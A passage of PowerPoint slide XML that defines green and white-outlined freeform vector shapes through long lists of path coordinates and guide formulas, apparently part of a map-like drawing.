                      <a:pt x="76" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36330" name="Freeform 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4357" y="2564"/>
                <a:ext cx="116" cy="245"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 116"/>
                  <a:gd name="T1" fmla="*/ 10 h 245"/>
                  <a:gd name="T2" fmla="*/ 16 w 116"/>
                  <a:gd name="T3" fmla="*/ 14 h 245"/>
                  <a:gd name="T4" fmla="*/ 34 w 116"/>
                  <a:gd name="T5" fmla="*/ 10 h 245"/>
                  <a:gd name="T6" fmla="*/ 47 w 116"/>
                  <a:gd name="T7" fmla="*/ 3 h 245"/>
                  <a:gd name="T8" fmla="*/ 58 w 116"/>
                  <a:gd name="T9" fmla="*/ 4 h 245"/>
                  <a:gd name="T10" fmla="*/ 73 w 116"/>
                  <a:gd name="T11" fmla="*/ 6 h 245"/>
                  <a:gd name="T12" fmla="*/ 72 w 116"/>
                  <a:gd name="T13" fmla="*/ 17 h 245"/>
                  <a:gd name="T14" fmla="*/ 82 w 116"/>
                  <a:gd name="T15" fmla="*/ 28 h 245"/>
                  <a:gd name="T16" fmla="*/ 94 w 116"/>
                  <a:gd name="T17" fmla="*/ 31 h 245"/>
                  <a:gd name="T18" fmla="*/ 87 w 116"/>
                  <a:gd name="T19" fmla="*/ 40 h 245"/>
                  <a:gd name="T20" fmla="*/ 76 w 116"/>
                  <a:gd name="T21" fmla="*/ 42 h 245"/>
                  <a:gd name="T22" fmla="*/ 70 w 116"/>
                  <a:gd name="T23" fmla="*/ 54 h 245"/>
                  <a:gd name="T24" fmla="*/ 64 w 116"/>
                  <a:gd name="T25" fmla="*/ 58 h 245"/>
                  <a:gd name="T26" fmla="*/ 57 w 116"/>
                  <a:gd name="T27" fmla="*/ 76 h 245"/>
                  <a:gd name="T28" fmla="*/ 70 w 116"/>
                  <a:gd name="T29" fmla="*/ 90 h 245"/>
                  <a:gd name="T30" fmla="*/ 71 w 116"/>
                  <a:gd name="T31" fmla="*/ 97 h 245"/>
                  <a:gd name="T32" fmla="*/ 91 w 116"/>
                  <a:gd name="T33" fmla="*/ 117 h 245"/>
                  <a:gd name="T34" fmla="*/ 100 w 116"/>
                  <a:gd name="T35" fmla="*/ 122 h 245"/>
                  <a:gd name="T36" fmla="*/ 108 w 116"/>
                  <a:gd name="T37" fmla="*/ 138 h 245"/>
                  <a:gd name="T38" fmla="*/ 116 w 116"/>
                  <a:gd name="T39" fmla="*/ 173 h 245"/>
                  <a:gd name="T40" fmla="*/ 113 w 116"/>
                  <a:gd name="T41" fmla="*/ 186 h 245"/>
                  <a:gd name="T42" fmla="*/ 113 w 116"/>
                  <a:gd name="T43" fmla="*/ 195 h 245"/>
                  <a:gd name="T44" fmla="*/ 105 w 116"/>
                  <a:gd name="T45" fmla="*/ 203 h 245"/>
                  <a:gd name="T46" fmla="*/ 95 w 116"/>
                  <a:gd name="T47" fmla="*/ 207 h 245"/>
                  <a:gd name="T48" fmla="*/ 84 w 116"/>
                  <a:gd name="T49" fmla="*/ 215 h 245"/>
                  <a:gd name="T50" fmla="*/ 76 w 116"/>
                  <a:gd name="T51" fmla="*/ 210 h 245"/>
                  <a:gd name="T52" fmla="*/ 76 w 116"/>
                  <a:gd name="T53" fmla="*/ 219 h 245"/>
                  <a:gd name="T54" fmla="*/ 69 w 116"/>
                  <a:gd name="T55" fmla="*/ 228 h 245"/>
                  <a:gd name="T56" fmla="*/ 63 w 116"/>
                  <a:gd name="T57" fmla="*/ 233 h 245"/>
                  <a:gd name="T58" fmla="*/ 53 w 116"/>
                  <a:gd name="T59" fmla="*/ 240 h 245"/>
                  <a:gd name="T60" fmla="*/ 46 w 116"/>
                  <a:gd name="T61" fmla="*/ 245 h 245"/>
                  <a:gd name="T62" fmla="*/ 45 w 116"/>
                  <a:gd name="T63" fmla="*/ 229 h 245"/>
                  <a:gd name="T64" fmla="*/ 48 w 116"/>
                  <a:gd name="T65" fmla="*/ 221 h 245"/>
                  <a:gd name="T66" fmla="*/ 38 w 116"/>
                  <a:gd name="T67" fmla="*/ 215 h 245"/>
                  <a:gd name="T68" fmla="*/ 52 w 116"/>
                  <a:gd name="T69" fmla="*/ 208 h 245"/>
                  <a:gd name="T70" fmla="*/ 65 w 116"/>
                  <a:gd name="T71" fmla="*/ 208 h 245"/>
                  <a:gd name="T72" fmla="*/ 61 w 116"/>
                  <a:gd name="T73" fmla="*/ 201 h 245"/>
                  <a:gd name="T74" fmla="*/ 69 w 116"/>
                  <a:gd name="T75" fmla="*/ 191 h 245"/>
                  <a:gd name="T76" fmla="*/ 83 w 116"/>
                  <a:gd name="T77" fmla="*/ 184 h 245"/>
                  <a:gd name="T78" fmla="*/ 87 w 116"/>
                  <a:gd name="T79" fmla="*/ 171 h 245"/>
                  <a:gd name="T80" fmla="*/ 85 w 116"/>
                  <a:gd name="T81" fmla="*/ 158 h 245"/>
                  <a:gd name="T82" fmla="*/ 87 w 116"/>
                  <a:gd name="T83" fmla="*/ 139 h 245"/>
                  <a:gd name="T84" fmla="*/ 82 w 116"/>
                  <a:gd name="T85" fmla="*/ 128 h 245"/>
                  <a:gd name="T86" fmla="*/ 82 w 116"/>
                  <a:gd name="T87" fmla="*/ 120 h 245"/>
                  <a:gd name="T88" fmla="*/ 71 w 116"/>
                  <a:gd name="T89" fmla="*/ 111 h 245"/>
                  <a:gd name="T90" fmla="*/ 50 w 116"/>
                  <a:gd name="T91" fmla="*/ 83 h 245"/>
                  <a:gd name="T92" fmla="*/ 32 w 116"/>
                  <a:gd name="T93" fmla="*/ 69 h 245"/>
                  <a:gd name="T94" fmla="*/ 32 w 116"/>
                  <a:gd name="T95" fmla="*/ 61 h 245"/>
                  <a:gd name="T96" fmla="*/ 40 w 116"/>
                  <a:gd name="T97" fmla="*/ 61 h 245"/>
                  <a:gd name="T98" fmla="*/ 43 w 116"/>
                  <a:gd name="T99" fmla="*/ 53 h 245"/>
                  <a:gd name="T100" fmla="*/ 32 w 116"/>
                  <a:gd name="T101" fmla="*/ 40 h 245"/>
                  <a:gd name="T102" fmla="*/ 24 w 116"/>
                  <a:gd name="T103" fmla="*/ 45 h 245"/>
                  <a:gd name="T104" fmla="*/ 14 w 116"/>
                  <a:gd name="T105" fmla="*/ 35 h 245"/>
                  <a:gd name="T106" fmla="*/ 3 w 116"/>
                  <a:gd name="T107" fmla="*/ 19 h 245"/>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116"/>
                  <a:gd name="T163" fmla="*/ 0 h 245"/>
                  <a:gd name="T164" fmla="*/ 116 w 116"/>
                  <a:gd name="T165" fmla="*/ 245 h 245"/>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116" h="245">
                    <a:moveTo>
                      <a:pt x="0" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36331" name="Freeform 63"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4363" y="2710"/>
                <a:ext cx="82" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 47 w 82"/>
                  <a:gd name="T1" fmla="*/ 8 h 69"/>
                  <a:gd name="T2" fmla="*/ 55 w 82"/>
                  <a:gd name="T3" fmla="*/ 10 h 69"/>
                  <a:gd name="T4" fmla="*/ 60 w 82"/>
                  <a:gd name="T5" fmla="*/ 11 h 69"/>
                  <a:gd name="T6" fmla="*/ 60 w 82"/>
                  <a:gd name="T7" fmla="*/ 8 h 69"/>
                  <a:gd name="T8" fmla="*/ 58 w 82"/>
                  <a:gd name="T9" fmla="*/ 4 h 69"/>
                  <a:gd name="T10" fmla="*/ 64 w 82"/>
                  <a:gd name="T11" fmla="*/ 1 h 69"/>
                  <a:gd name="T12" fmla="*/ 70 w 82"/>
                  <a:gd name="T13" fmla="*/ 5 h 69"/>
                  <a:gd name="T14" fmla="*/ 79 w 82"/>
                  <a:gd name="T15" fmla="*/ 1 h 69"/>
                  <a:gd name="T16" fmla="*/ 79 w 82"/>
                  <a:gd name="T17" fmla="*/ 7 h 69"/>
                  <a:gd name="T18" fmla="*/ 82 w 82"/>
                  <a:gd name="T19" fmla="*/ 19 h 69"/>
                  <a:gd name="T20" fmla="*/ 81 w 82"/>
                  <a:gd name="T21" fmla="*/ 25 h 69"/>
                  <a:gd name="T22" fmla="*/ 80 w 82"/>
                  <a:gd name="T23" fmla="*/ 36 h 69"/>
                  <a:gd name="T24" fmla="*/ 73 w 82"/>
                  <a:gd name="T25" fmla="*/ 40 h 69"/>
                  <a:gd name="T26" fmla="*/ 63 w 82"/>
                  <a:gd name="T27" fmla="*/ 45 h 69"/>
                  <a:gd name="T28" fmla="*/ 54 w 82"/>
                  <a:gd name="T29" fmla="*/ 52 h 69"/>
                  <a:gd name="T30" fmla="*/ 60 w 82"/>
                  <a:gd name="T31" fmla="*/ 58 h 69"/>
                  <a:gd name="T32" fmla="*/ 59 w 82"/>
                  <a:gd name="T33" fmla="*/ 62 h 69"/>
